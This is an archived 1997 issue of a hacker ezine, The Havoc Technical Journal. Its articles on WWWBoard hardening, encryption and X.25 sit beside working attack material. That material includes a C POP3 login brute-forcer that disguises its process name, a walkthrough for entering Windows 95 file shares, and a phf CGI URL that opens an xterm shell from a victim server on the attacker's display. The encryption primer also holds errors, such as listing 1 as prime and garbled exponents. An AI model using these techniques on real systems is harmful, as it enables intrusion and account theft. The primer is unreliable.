home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 112.5 KB | 2,573 lines |
- ┌──────────────────────────────────────────────────────────────────┐
- │Vol. 2 No. 2 The Havoc Technical Journal Issue 14│▒
- │ - http://www.thtj.com - │▒
- │ September 1, 1997 - A Havoc Bell Systems Publication │▒
- └──────────────────────────────────────────────────────────────────┘▒
- ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
-
- ═────────────────────────────────────────────────────────────────────────────═
-
- ·THTJ - Writing text files like they're going outta style·
- ┌──────────────────────────────────────┐
- ·-=│THTJ───[14]────Contents────[14]───THTJ│=-·
- └──────────────────────────────────────┘
- Editorial..............................Scud-O
- Spreading the knowledge................KungFuFox
- Pop3.c mail port hacker................memor
- Securing your WWWBoard.................Black Sol
- Hacking Win95 With NBTSTAT.............W3|rd
- More on cgi-bin holes..................]NiCK[
- Encryption for dumbasses...............t33
- More info on X.25 than the CIA has!....memor
- Beyond HOPE review.....................AlienPhreak
- Tatoo pager info and more..............memor
- Help-a-phreak..........................THTJ
- Oddville, THTJ.........................Scud-O
- The News: HOPE, AOL Haxors, & SPAM!....KungFuFox
- Logs...................................THTJ
- ────────────────────────────────────────────────
- ┌──────────────────────────────────────┐
- │ thtj.com is proud to now be hosting │
- │ global kOS - http://www.thtj.com/kOS/│
- │ check it out. │
- └──────────────────────────────────────┘
- ═────────────────────────────────────────────────────────────────────────────═
- ┌─────────────────────────────────────────────────────┐
- │The Havoc Technical Journal - contacts & information │
- └─────────────────────────────────────────────────────┘
-
- - Editor in Chief : Scud-O, scud@thtj.com
- - Assistant Editor : KungFuFox, mazer@cycat.com
- - Submissions Editor: Keystroke, keystroke@thepentagon.com
- - thtj email address: thtj@thtj.com
- - thtj website: http://www.thtj.com/
- - thtj mailing address: PO BOX 448 Sykesville, MD 21784
-
- The Havoc Technical Journal Vol. 2, No. 2, September 1st, 1997.
- A Havoc Bell Systems Publication. Contents Copyright (⌐)
- 1997 Havoc Bell Systems Publishing. All Rights Reserved.
- No part of this publication may be reproduced in whole or
- in part without the expressed written consent of Havoc
- Bell Systems Publishing. [No copying THTJ, damnit.]
-
- The Havoc Technical Journal does in no way endorse the
- illicit use of computers, computer networks, and
- telecommunications networks, nor is it to be held liable
- for any adverse results of pursuing such activities.
-
- For information about using articles published in THTJ, send mail to:
- E-mail: thtj@thtj.com
- US-mail: THTJ c/o HBS, PO Box 448, Sykesville, MD 21784
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ Editorial by Scud-O │
- └──────────────────────────────────────┘
-
- I'm taking a break from writing an editorial this month because I've
- been especially busy with THTJ for most of August, cya next month.
- Scud-O
- ----------------------------------------------
- / ---/ --/ / / | /------/ / /
- /--- /-----/------/-----/ / / /
- /----------/ /--------/
- -of Havoc Bell Systems-
-
- scud@thtj.com | http://www.thtj.com
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌────────────────────────────────────────┐
- │ Spreading the knowledge - by KungFuFox │
- └────────────────────────────────────────┘
-
- It's survived for 14 issues, the first 3 spoken of only in legend. It's
- succeeded where others have failed. It's stood the test of time. It's past
- its first birthday. Hooray for THTJ. A lot goes into making a publication
- like this, and even more goes into putting it out on time. Funny how that's
- not the norm in the world of ezines, coming out on time. I guess it's the
- pressure of a deadline that's scared people away from the idea.
-
- Taking a look at the booming industry of ezines out there, I can't help but
- notice that not many of them make it very far. For whatever reason, they fall
- below the horizon far sooner than they should. Maybe the initial motivation
- to make the zine was no longer there, or maybe the editors didn't get enough
- articles to keep publishing; something just didn't go right. They all started
- off with the same goal, to bring information to the public. I think it's
- noble that people are still out there trying to spread the knowledge, because
- I think that's what ezines are for. They help the community by giving them
- the knowledge that they would have a great deal of trouble getting otherwise.
-
- As I reflect on the maturity of THTJ, on the changes it's gone through over
- time, I do feel a good deal of pride in its success. From its early days of
- paper form, through its evolution as an ezine, and to the present point, its
- message has stayed the same; spread the knowledge. We spread the knowledge
- every month, with the seemingly endless stream of articles that are sent in
- from everyday people like you, from the community. We sure as hell couldn't
- survive without the help of our reader/writers.
-
- This zine has kept going because the idea of spreading the knowledge isn't
- extinct, and hopefully it never will be. That's what freedom of speech is all
- about, isn't it? Not about burning flags, or dressing in drag, or whatever.
- It's about being able to exchange information without barriers, without
- censors, without the challenge of fighting your allies to learn. If there
- were no ezines, if nobody out there had the motivation to spread the
- knowledge, if it was an every man for himself community, we'd be censoring
- ourselves by holding the knowledge away from the people who want it, who can
- use it.
-
- Zines like Phrack and PLA have kept the scene informed, and laughing, for
- the duration of this decade (and in the case of Phrack, for a good chunk of
- the 80s as well). It is their success that has brought many a newbie into the
- scene, just because of the openness and freedom of knowledge exchange that
- these zines have promoted. Though 2600 is not an ezine, and not free, it
- has kept the public informed for many years. It has also indirectly
- influenced the ezine industry for some time now, forcing those who want the
- knowledge to stay free to make their own ezines, and keep the knowledge
- flowing.
-
- Many a zine have come and gone, making maybe 1, maybe 2 issues. And of those
- many, perhaps 1 in 20 of them makes a 3rd, and a 4th, and keeps the knowledge
- flowing, but just 1 out of 20 is all it takes to keep the scene alive. There
- are some newcomers out there, starting out like the many before them, and
- they're continuing the tradition, taking over where others have left off.
- Zines like System Failure, Zero, Ocean County Phone Punx, and Confidence
- Remains High. They all show promise, and I'm sure there are many more like
- them that I don't even know about. It can only be hoped that this trend of
- knowledge spreading never ends, and should it ever, by the hand of some
- contemptuous hypocrite, we'll not be the disgraced for trying.
-
- The Havoc Technical Journal is going to continue to spread the knowledge for
- as long as it can, but nothing lasts forever, and times do change. We're
- aiming to better ourselves, to make this publication as informative, as
- interesting, and as entertaining as possible. The opinions of our readers are
- the best way for us to judge our strengths, our weaknesses, to determine what
- it is we're doing right, and what it is we need to be doing. Flame us if
- necessary, just let us know what you want to see, what you don't want to see
- and what it is you see that you think is really swell. Operators are standing
- by!
-
- KungFuFox <mazer@cycat.com>
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌────────────────────────────────────┐
- │ Pop3.c mail port hacker - by memor │
- └────────────────────────────────────┘
-
- /*
- A little pop3 "hacker" by memor
-
- Sends a USER username and PASS username to a pop3 server on port 110
- read from a passwd file on the target server. (I guess that passwd
- file is shadowed and you are trying to gain access to some joe accounts)
-
- Compile it with cc -o pop3 pop3.c
-
- Usage: pop3 server-ip passwdfile port(optional)
-
- Tested on linux 2.0.30
-
- */
-
-
- /* Includes for File managing, String managing.. Default c commands, exit
- commands, socket managing */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <netdb.h>
- #include <sys/socket.h>
- #include <arpa/inet.h>
- #include <sys/types.h>
- #include <netinet/in.h>
-
- /* Defining Global variables */
- /* Defining a socket, a string, 2 functions */
-
- FILE *soc;
- char *str;
- int sock;
- void answer();
- void sending();
-
- /* main routine */
-
- int main(int argc, char *argv[])
- {
-
- /* defining a for the users counter, strr as a string for containing username,
- port, count as file counter, structure for socket */
-
- int a;
- FILE *userfile;
- char *strr;
- char *ips;
- int count, port = 110;
- struct sockaddr_in ip;
-
- /* space in the 3 strings.. */
-
- str = (char *)malloc(100);
- strr = (char *)malloc(100);
- ips = (char *)malloc(100);
-
- /* you need more arguments if you want it to work.. server port is not
- needed cause pop is on port 110 */
-
- if ( argc < 3 )
- {
- printf("Usage: %s (ip of pop3 server) (userfile) (server port)\n", argv[0]);
- exit(1);
- }
- else
- if ( argc > 2 )
- {
- if(argc > 3) port = atoi(argv[3]); /* if port argument defined */
- userfile = fopen(argv[2],"r"); /* opening the userfile */
- if(userfile == NULL ) /* is the userfile open? */
- {
- printf("Userfile doesnt exist..\n");
- exit(1);
- }
- }
- /* argv[1] -> ips.. so i'll nuke argv [1] and the others argv for hiding all of that now :) */
- strcpy(ips,argv[1]);
-
- /* now i hide all as some man using.. */
- sprintf(argv[0],"man ");
- sprintf(argv[1]," ");
- sprintf(argv[2]," ");
- if(argc>3) sprintf(argv[3]," ");
-
-
-
- do /* lets begin a loop for userfile reading */
- /* open a socket for connecting */
- {
- if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
- {
- perror("socket");
- exit(0); /* bye */
- }
- /* i need to read you as a file, miss socket */
- soc=fdopen(sock, "r");
-
- /* fill target address structur */
- ip.sin_family = AF_INET;
- ip.sin_port = htons(port);
- ip.sin_addr.s_addr = inet_addr(ips);
- bzero(&(ip.sin_zero),8);
-
-
- /* counters are 0 now.. but in a few ? ;) */
- a=0;
- count=0;
- do /* lets begin to get an username */
- {
-
- strr[count]=fgetc(userfile); /* i catch a caracter in the file */
- if(strr[count]==':') /* is it a ':' ? */
- {
- strr[count]='\0';
- a=1; /* it is a ':' so i'll forget to get the others caracters */
- }
- if(strr[count]==13) strr[count]='\0'; /* it is a 13? ok.. i forget it too */
- strr[count+1]='\0'; /* i make my string */
- count++; /* counting for filling strr */
- }
- while(strr[count-1]!=10 && strr[count-1]!=EOF); /* stop if we find the lf or end of file caracters */
-
- if(strr[count-1]!=EOF && strlen(strr)>1) /* is my username > 1 caracter and am i not at the end of file ? */
- {
- if(strr[count-1]==10) strr[count-1]='\0'; /* if i see a lf, i kill it*/
- printf("Username attempt: ->%s<-\n",strr); /* what is the username trying */
- sprintf(str,"USER %s\n",strr); /* copy the USER name in str */
-
- /* connect to the pop3 server */
- if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 ) /* i cant connect it? */
- {
- perror("connect");
- exit(1); /* bye bye .. :) */
- } /* so i can connect it that mean if i am here.. */
- else
- {
- /* server is talking.. */
- printf("Server.. hello..\n");
- answer(); /* please tell me what does the server says */
- printf("%s",str); /* now i send that USER name*/
- sending(); /* sending it.. */
- printf("Server is answering...");
- answer(); /* answer +OK from the server i guess */
- sprintf(str,"PASS %s\n",strr); /* i'll send now that PASS name i first fill str with it*/
- printf("%s",str); /* ok i am ready to send it */
- sending(); /* sending it .. */
- printf("Server is answering...");
- answer(); /* i am receiving or a +ERR or a +OK i guess */
- printf("Ok finish for that ROUND.. \n");
-
- /* finished that round*/
-
- close(sock); /* closing that socket */
-
- }
-
- }
- }while(strr[count-1]!=EOF); /* im not at the end of file? so i continue */
-
- }
-
- /* sending string str */
-
- void sending()
- {
- if ( send(sock, str, strlen(str), 0) < 0 ) /* can't i send str ? */
- {
- perror("send");
- exit(1); /* i cant, so see you later */
- }
-
- }
-
- /* receiving caracters from the server */
-
- void answer()
- {
- /* first.. a caracter is a char type.. */
- char ch;
- do
- { /* begin receiving caracters */
- ch=getc(soc);
- printf("%c",ch); /* please tell me what the server says */
- }
- while(ch!='\r'); /* ok i received a 13.. i guess he wont talk anymore now.. i hope */
- printf("\n");
- }
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌───────────────────────────────────────┐
- │ Securing your WWWBoard - by Black Sol │
- └───────────────────────────────────────┘
-
- Note: this is intended for those with their own websites;
- and use Matts WWWBoard CGI Script (http://www.worldwidemart.com/scripts)
- This is a perl script for a message board system, and as all programs,
- carries bugs which can be easily exploited. If you have this perl script
- running on your site, or plan on it, this text may be almost necessary for
- its safety.
-
- Well, more and more sites these days appear to have the WWWBoard script which
- allows any person to post a message to your board, and let others read it.
- This is considered a very convenient tool, but, as everything, has flaws and
- can be exploited. The first part of this is the security issue brought up
- with the associated WWWAdmin program that goes with WWWBoard, and second, an
- issue of editing the PERL Script itself for better security.
-
- WWWAdmin Hole: |
- ---------------+
- The Exploit:
- Used to remove messages from your board, WWWAdmin is used very commonly when
- a person uses WWWBoard. The default file name is
- /wwwboard_Directory/wwwadmin.cgi or www.admin.pl
-
- You also must have a user name and password, which is stored in the
- passwd.txt file. This can be a very big problem. The method WWWAdmin uses to
- encrypt the password is the same as normal unix passwords, so therefore,
- password crackers, like CrackerJack or John the Ripper can be used to crack
- it.
-
- The way it is displayed is this:
- WebAdmin:aepTOqxOi4i8U
- WebAdmin is the username and aepTOqxOi4i8U is the encrypted password. If you
- put this into unix format, lets say..
- WebAdmin:aepTOqxOi4i8U:275:15:Emmanuel Goldstein:/usr/homos/egold:/bin/csh
-
- and then, used sturdy old John the Ripper to crack it, you'd come up with the
- password WebBoard. Then, you'd just have to go to lets say
- www.host.com/wwwboard/wwwadmin.cgi or wwwadmin.pl and use WebAdmin and
- WebBoard as the password, and you can edit and delete all their stuff..
-
- How to Fix it:
- Don't panic because you might get hacked by some ego-maniac kid hacker who
- doesn't have anything better to do then ruin other peoples fun, this can be
- easily fixed. There are several methods, i suggest using all of them for
- maximum security.
-
- Method #1 - Don't use the standard wwwadmin.pl or wwwadmin.cgi for the name.
- Use some random numbers and letters when uploading this to your server, for
- instance, make it wadawambrblah.cgi. This way, only you will even know where
- the admin script is, so even if they get the password they won't know where
- to go!
-
- Method #2 - Don't use the standard passwd.txt for the passwd file. Change it
- also to something random like sdihff.bla - NOTE - you must also make this
- change in the WWWAdmin script, under the location for your passwd file. More
- details in the WWWAdmin readme file..
-
- Method #3 - As soon as you upload it, IMMEDIATLY change the username and
- password! And do not use common words, most words can be found in wordlists,
- which basically means, you can still get hacked..use random names, like
- ajgndnbvfd for the password, etc. etc., you get the point (i hope). Make it
- LONG and use numbers as well, like a4mg4msdfsd9as9.
-
- Note - be sure to keep your passwords written down, so you can remember them!
-
- Method #4 - When you change your password, make sure it is more then 8
- letters+numbers. Password crackers crack up to 8 characters, so, if your
- password is longer then that, and someone gets your password file; they can
- only crack the first 8 letters/numbers, and they can't get the rest of the
- password.
-
- Method #5 - Modify your PERL script so only ip's from your ISP (internet
- service provider) can access the wwwadmin script, whatsoever. Note - more on
- this below!
-
- Method #6 - Chmod your passwd text file and even wwwadmin cgi script so that
- nobody can access it, and then when you need to use it, you can chmod it back
- to world readable/executable.
-
- For example, log in to your shell, and then do the following:
-
- -+-
- cd wwwboard (wwwboard being the name of the dir everything is in)
- chmod o-rwx passwd.txt (passwd.txt being the name of the passwd file for
- wwwadmin)
- chmod o-x wwwadmin.cgi (wwwadmin.cgi being the name of the wwwadmin script
- file)
- -+-
-
- That's all. now if someone tries to access your WWWAdmin or your password
- file, they will get a Forbidden Access error. However, so will you. So, when
- you want to use your wwwadmin script, go back to your shell and do this:
-
- -+-
- cd wwwboard
- chmod o+rwx passwd.txt
- chmod o+x wwwadmin.cgi
- -+-
- Its as simple as that.
-
- Modifying the PERL Script for more security: |
- ----------------------------------------------+
- In most situations, people using WWWBoard do not know PERL, the programming
- language that it is written in. Knowing PERL can benefit you greatly. What
- are some things you could do if you knew how to edit the perl script?
-
- 1) Ban certain people from using your board
-
- 2) Ban all people from a certain internet provider from using your board
-
- 3) Stop other people from using your nickname/handle
-
- 4) Record the IP, Internet Address, Web Browser, time and date, and the
- message that person posted; to a file each time somebody posts.
-
- 5) Change the background colors, background appearance, and the general
- appearence, and layout of the board to YOUR liking.
-
- 6) Display information such as a persons IP and web browser in their post.
-
- 7) Require a username and password to make posts.
-
- 8) Stop other people from accessing your WWWAdmin script.
-
- Unfortunately, to describe how to actually DO those things it'd take another
- text in itself :) You can check out this site for some pointers with perl:
-
- http://www.ora.com/catalog/pperl2/excerpt/ch01-01.htm
-
- Until then, I can include one method you can use. It is pretty easy to
- include somebodies IP or host in a post. Start off with these two lines, in
- the top, with the other variables:
-
- # Start perl sample
- $host = $ENV{'REMOTE_HOST'};
- $ip = $ENV{'REMOTE_ADDR'};
- # End perl sample
-
-
- Those two lines will put the persons IP and host into two little variables.
- Now, in the procedure where it writes to the html file, you can include those
- two variables to display the poster's info. The procedure to put this into is
- new_file If your unsure of where to put this, just look for a print NEWFILE
- "blah blah\n"; statement..you can look for where it says something like
- "posted by $name" or whatever, and you can just add $host or $ip into the
- line somewhere.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌───────────────────────────────────────┐
- │ Hacking Win95 With NBTSTAT - by W3|rd │
- └───────────────────────────────────────┘
-
- Requirements for the hack to work:
- Windows 95 & the Victim must run NETBIOS and have "sharing" on their hard
- drives.
-
- First type 'nbtstat -A x.x.x.x'
-
- If your lucky you'll get something like this.
-
- NetBIOS Remote Machine Name Table
- Name Type Status
- ---------------------------------------------
- ^M0REBID <00> UNIQUE Registered
- VIRTUAL COMPUTE<00> GROUP Registered
- ^M0REBID <03> UNIQUE Registered
- MAC Address = 44-45-53-54-00-00
-
- Remember the first UNIQUE name here.
-
- Now create 'lmhosts' in your windows dir.
- it should look like this:
-
- x.x.x.x ^M0REBID
-
- Then you purge nbtstat like this: 'nbtstat -r'
-
- Then goto Find -> Computers
- on the Start Menu in Windows 95.
- Type in the UNIQUE name and search.
- Then if found , double click on the name , and if you get up a window with
- for example C and D .. you will have Access to his harddrives.. ;)
-
- You may now read his/her files ... and remember be creative... ;)
- (But remember , some people might have sharing on..but with pwd!)
-
- Mission Accomplished...
-
- Thankz to: iO and ^D-BL00D^ (my Co-prez in NHF)
-
- W3|rd - Prez. of Norwegian Hacker Force, and a Rebel X Hacker.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ More on cgi-bin holes - by ]NiCK[ │
- └──────────────────────────────────────┘
-
- 1 - The largest server database helps exploit phf
- *************************************************
-
- I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of
- this websearch well enough, you can succeed to have a list of more
- than 3000 insecure servers with this method, simply by typing:
-
- http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.
- &q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
- (type this all in on one line)
-
- Too easy! Isn't it? Also, you can modify it to search for php.cgi,
- webgais, or others such as view-source...
-
- Note: Sometimes, some servers won't work... but its just because the
- database isn't updated every day.
-
-
- 2 - Other stuff to exploit websearchs
- *************************************
-
- I love the "Yellow Pages" of organizations, enterprises, or companies
- like for instance Adminnet (www.adminet.com)... its filled with kewl
- insecure web servers.. But the problem is that it's not very
- interesting to scan manually... So, I wrote a little program to change
- the html index of web servers into a list of exploitable servers for
- phfscan or phpscan...
-
- Here is a little unix script:
-
- --
- if [ $# = 0 ]
- then
- echo "Usage: html2list file.html" >&2
- exit 1
- cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/'
- '\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list
- (one again, the last 2 lines need to be moved up together)
- --
-
- Note: You can change/update it to a better way of scanning...
-
-
- 3 - Xterm with phf
- ******************
-
- Cracking the /etc/passwd ! ok... but there are better things to do
- than waste your time. This attack consists of using Xterm with phf.
- So, of course Xwindows must be present on the victim server, and you
- must also be running it. While in Xwindows, write this: 'xhost
- +www.victim.com' This is so your machine will accept connections
- from victim.com... You can simply type 'xhost +', but it isn't really
- secure... After, you must know what os www.victim.com is running,
- so you can guess the path of Xterm.
-
- Here are some default Xterm paths for a few systems:
-
- AIX : /usr/bin/X11/xterm
- HP-UX: /usr/bin/X11/hpterm
- Linux: /usr/X11R6/bin/xterm
- SunOS: /usr/openwin/bin/xterm
-
- You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
- you have a shell on the machine.
-
- Finally, once you have found the path, you can run xterm via phf like:
-
- http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/
- xterm%20-display%20your.ip.com:0 (combine these two lines)
-
- Wait a few seconds... and whoop, a shell from the victims server will
- appear in your Xwindow. :) Usually you become an user Nobody, but
- sometimes, if the http daemon runs in a root shell, your become root,
- or www sometimes.. The best thing is that your access is not logged
- in the lastlog or wtmp... Very clean exploit !
-
- Have PHFun ! :)
-
-
- -]NiCK[ <Modul1@usa.net>
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ Encryption for dumbasses - by t33 │
- └──────────────────────────────────────┘
-
- This article is intended for the people who know shit about encryption and
- want a little more info about it.
- Hope it is useful.
-
- Contents:
-
- 1) What is Encryption?
- 2) How does Encryption work?
- 3) Brute Force Attack
- 4) Factoring Techniques
- 5) How Long Should a Key be?
- 6) Mounting an Attack
- 7) What is RSA?
- 8) What is DES?
- 9) What us Substitution?
- 10) What is Permutation?
-
- 1) What is Encryption?
-
- Encryption is simply the encoding of messages so that they cannot be read by
- anyone who does not know how to decipher it. Governments and militaries have
- been using codes to make their messages unreadable for many years. For
- example, Caesar used a code to send military messages that was simply a shift
- of the letters in the message three spaces down in the alphabet (an A becomes
- a D). In cryptographic language this is known as a shift cypher.
-
- The properties of a good cryptosystem are analogous to that of a normal lock.
- A good system will have a very large key which is one of a large number of
- keys (termed keyspace). It will also provide cyphertext (encrypted plaintext)
- that appears random and stands up to known decryption attacks. Lastly, the
- system should be suitable to the function for which it is intended. For
- example, if a message is to remain secret for ten years or more, then the
- system should take into account the future speed of computers and their
- corresponding ability to attack the system. However, except for classified
- government information (and maybe the Coca-Cola secret recipe), the reality
- is that the relevance of most corporate information traveling over networks
- is measured in days or weeks, and not decades.
-
- 2) How Does Encryption Work?
-
- Most encryption algorithms are based on the concept of complex mathematics
- that work in only one direction and are generally based on the difficulty of
- factoring very large numbers (keys) that are used for the encryption. These
- large numbers are the product of large prime numbers. For example, anyone can
- multiply two large prime numbers to obtain a result, but it is very difficult
- for someone else to factor the large number to get back the two primes. This
- is to say that mathematicians have yet to figure out a method for reversing
- the math effectively. In this way, cryptography has been a secure method of
- ensuring data confidentiality over computer networks.
-
- 3) Brute Force Attack
-
- The traditional method of breaking complex mathematical codes is through
- brute-force attacks. This method is mathematically the easiest to perform,
- but relies on vast computer processing power and is therefore the easiest to
- defend against. A brute force attack tries every possible combination of keys
- in order to unlock the encryption. Therefore, simply increasing the keyspace
- will increase the amount of time needed to mount a brute force attack. The
- reality is that a brute force attack is not a method which will ever be used
- to decode cyphertext. Some quick calculations relating computer speeds and
- key length will yield code-breaking times that exceed the expected life of
- the universe.
-
- The brute force method needs a sample of unencrypted text for the computer to
- compare each decryption attempt with the actual text. This can be easily
- obtained by knowing the nature of the messages being intercepted. For
- example, all Microsoft word files will have a set of standard information
- (bytes). How the decryption functions is easy. A key that is 128 bits long
- will have 2128 possible values. Therefore, assuming that a very fast computer
- that can try one million keys per second (consider that attempting a key
- requires many instructions) it will take 225 years to try all of the
- combinations with a 50% probability that it will be found in the first 224
- years (remember that the universe is estimated to be 210 years old). (Bruce
- Schneier, Applied Cryptography c.1995).
-
- 4) Factoring Techniques
-
- The more feasible form of attack will come from mathematicians refining
- existing and developing new factoring techniques. These methods have been
- used to show potential vulnerabilities in key-based encryption. However, they
- still require massive computer power and long time-frames to break the
- encryption. For example, a 129-digit number was factored at Bellcore labs in
- 1994. This used the idle time on 1600 computers around the world, over a
- period of 8 months using a computation called the quadratic sieve. The
- authors estimated that they used .03% of the computing power of the Internet,
- and believed that, with a highly publicized event, they could acquire 100,000
- computers (approx. 2% of the Internet) without resorting to illegal or
- unethical efforts such as an Internet worm.
-
- 5) How Long Should a Key be?
-
- The security of a cryptosystem depends on the strength of the algorithm and
- the length of the key. The strength of the algorithm is difficult to
- understand. However, understanding the methods of how the keys are decrypted
- provides some clues as to it's strength. Knowing that all numbers can be
- represented by a set of primes, encryption techniques rely on the difficulty
- of factoring very large numbers into their respective primes. Lets look at a
- very simplified example (cryptologists will undoubtedly cringe at the over
- simplification):
-
- Suppose we have number n represented by x and y such that n = xy. The
- quadratic sieve method works by first assuming that the numbers x and y are
- close to one another on a number line. Successive steps either prove or
- disprove this and search out the next numbers. Therefore, effective
- encryption will create keys which are not close to one another. However, the
- numbers cannot be so far apart as to have the one of x or y set to a very
- small value. Effective encryption-based key generation will generate the keys
- randomly, but also discard those keys which will be susceptible to
- factor-based decryption systems.
-
- What is involved in factoring a number? Anyone with a grade six education (or
- a calculator) can easily multiply together two numbers. Anyone with a grade 9
- education (and who remembers it) can factor a small number into its primes. A
- prime number is any integer which is only divisible by itself and by 1. For
- example, the sequence of the first seven prime numbers is: 1,2,3,5,7,11,13...
-
- Lets say we express the number 24 as a set of its primes. This is simply
- 2*2*2*3 = 24. Seems simple enough. Now, for those of you who think this is
- easy, try entering the RSA factoring challenge and they will award you a
- prize if you can do it on very large numbers (see the link at the end of this
- document).
-
- Another method called the general number field sieve can factor numbers
- approximately 10 times faster than the quadratic field sieve, but is only
- faster for larger numbers (greater than 110 digits). This method hasn't been
- refined to the degree of the quadratic sieve but, with time will likely be
- the method of choice for factoring large keys.
-
- Factoring large numbers is very hard, but is becoming easier therefore
- predictions based on security required for long term encryption cannot be
- made. However, most people don't require their data to remain secure for 100
- years. For example, information about stock market conditions may only be
- relevant for a few days. Decisions based on that information need only be
- protected for a few hours. At the end of the day everyone's trades become
- known anyway. For a manufacturer, design specs. need only be kept secret
- until product launch. For the longest-term secrets, such as military secrets,
- key length should be based on the computing speeds at that time and the
- projected future increases. Two general rules of thumb is that computing
- power increases by a factor of 10 every five years and it is always best to
- be cautious when making predictions.
-
- 6) Mounting an Attack
-
- With respect to computing methods, a hardware or a software based attack can
- be mounted. Hardware designers and cryptologists have designed machines
- specifically for breaking codes which can greatly increase the rate at which
- a code is broken. This involves hundreds of parallel processors working on
- different 'parts' of the key.
-
- A software-based attack is much slower but is also much cheaper to mount. For
- example, using an algorithm with a 56 bit key, a software attempt run on 512
- workstations capable of running the algorithm at a rate of 15,000 encryptions
- per second, running 24 hours per day would require 545 years to test all
- possible numbers (Bruce Schneier, Applied Cryptography c.1995) . Importantly,
- with a 40 bit key (the only key length currently allowed for export under
- federal legislation) a similar network would take just under two days to
- complete the attack.
-
- A 128 key makes brute force cryptanalysis effectively useless, even when
- factoring estimates for increases in the number of networked computers in the
- world and increasing processor speed. However, it is still susceptible to
- factoring methods when distributed among several computers. The next logical
- question is, why not use keys with a very large number of bits (>2000)? The
- answer lies in the tradeoff between security and usability. The longer the
- key length the longer the time needed for encryption. Encryption over a LAN
- environment should not be a bottleneck in the communications.
-
- 7) What is RSA?
-
- RSA is the industry standard for public key cryptography. Its algorithm is
- based on the difficulty of factoring large numbers. Encryption is performed
- 'one-way', indicating that f(x) is the encryption function but f-1(x) is very
- hard to compute.
-
- 8) What is DES?
-
- Data Encryption Standard (DES) is the standard for private key encryption and
- is recognized by international standards organizations such as ANSI and ISO.
- Standard encryption schemes are needed to ensure interoperability of systems
- for the same reasons standards are needed for all network applications. The
- most important criteria for a standard (and in fact any) cryptographic scheme
- is that the security must rely on the key and not in the secrecy of the
- algorithm. By the definition of encryption, simply deducing the algorithm
- should not make it any easier to decrypt messages.
-
- DES uses the same key for encrypting as decrypting. This encryption is not
- based on the difficulty of factoring large numbers but is based on a set of
- non-linear transformations. The key can be any 56-bit number and there are
- few weak keys. A good example of a weak key is one that is all 0's or 1's.
- This encryption is not based on the difficulty of factoring large numbers but
- is based on a set of non-linear transformations. DES is a single combination
- of operations, substitution followed by permutation, performed on the message
- based on the key and on a set of constant values (the algorithm). This
- function is repetitive and so can be easily implemented using hardware,
- making it a very fast solution for encryption.
-
- 9) What is a Substitution?
-
- A substitution is quite easy to understand. Letters of the alphabet can be
- randomly substituted for other letters according to a key as follows:
-
- a b c d e f g...
- q s l b z e r...
-
- This substitution key is held by both the person coding the message and the
- person decoding the message. The key is simply the substitution of the number
- of letters in the alphabet (and could include the space-value). Therefore the
- number of permutations is simply 26!. A very large number which could not be
- analyzed by brute force. However, this simple type of encryption can easily
- be analyzed using other methods.
-
- 10) What is a Permutation?
-
- A permutation does not involve changing the values of the plaintext. A
- permutation alters their position but leaves the character values unchanged.
- The method is performed mathematically using a permutation matrix in which
- each row contains only one '1' for the row of size 'm'. The best way to
- illustrate this is through a simple alphabetic example:
-
- We will use the following key (m=4)Value: 1 2 3 4 Key: 3 4 1 2 to encrypt the
- following: howareyou.
- First arrange in groups: howa|reyo|u
- Perform the permutation: wahoyoreu
- Decrypt with the inverse key.
-
- DES functions by first dividing the initial text (bitstring) of length 64
- bits, into two halves (32 bits). The 32 bit string is expanded to 48 bits. An
- initial permutation is performed on the bitstring according to a function
- derived from the encryption key. The DES algorithm then performs a set of
- constant substitution functions using 8 S-boxes followed by the permutation
- (An S-box is the term for a 4x16 matrix which is used to perform the
- substitution on the bitstring of length, 48 bits). This is followed by a
- round of key-based encryption using 48 of the 56 bits in the key. The whole
- set of functions is repeated 16 times.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ The X.25 goods - by memor │
- └──────────────────────────────────────┘
-
- 1. What is X.25 ?#
- ##################
-
- Different Network, really far for links use that protocol and equipment
- named X.25, lots of networks like Transpac, Datapac, Tymnet use that X.25
- Protocol.. It uses a hardware named PAD X.25
- (Packet Assembler/Dissassembler). Users are connecting to those PADs from a
- phone number with a or from a tcp/ip gateway from Internet, or from
- another ways.. and from those PADs, they connects the X.25 servers with
- the command connect (c), you can also configure a lot of parameters for your
- connection (when you'll lost the connection, parameters will be defaults
- again.) with the commands full or half (full duplex, half duplex), the
- command set for the PAD parameters, the command par? is for displaying the
- PAD parameters, stat displays your port address on the PAD. for
- disconnecting, here is the command bye or disconnect.. with that hardware,
- when connecting it, setting a right user ID, (if you can connect reverse
- charging calls host), you must know that any network has a prefix (dnic) for
- instance : 02080 is for Transpac in France.. 03110 is for telenet in USA. (of
- course, with the USER ID is required a PASSWORD.. that would be so easy ID
- xxxxxx is for the user id, and it will ask for a password after.)
-
- 2. here are the prefixs of some networks you can connect o with an x.25 pad:#
- #############################################################################
-
- 02080 is Transpac / France
- 02342 is PSS / England
- 02405 is Telepak / Sweden
- 02624 is Datex-P / Germany
- 03106 is Tymnet / USA
- 03110 is Telenet / USA
- 04251 is Isranet / Israel
- 05252 is Telepac / Singapore
-
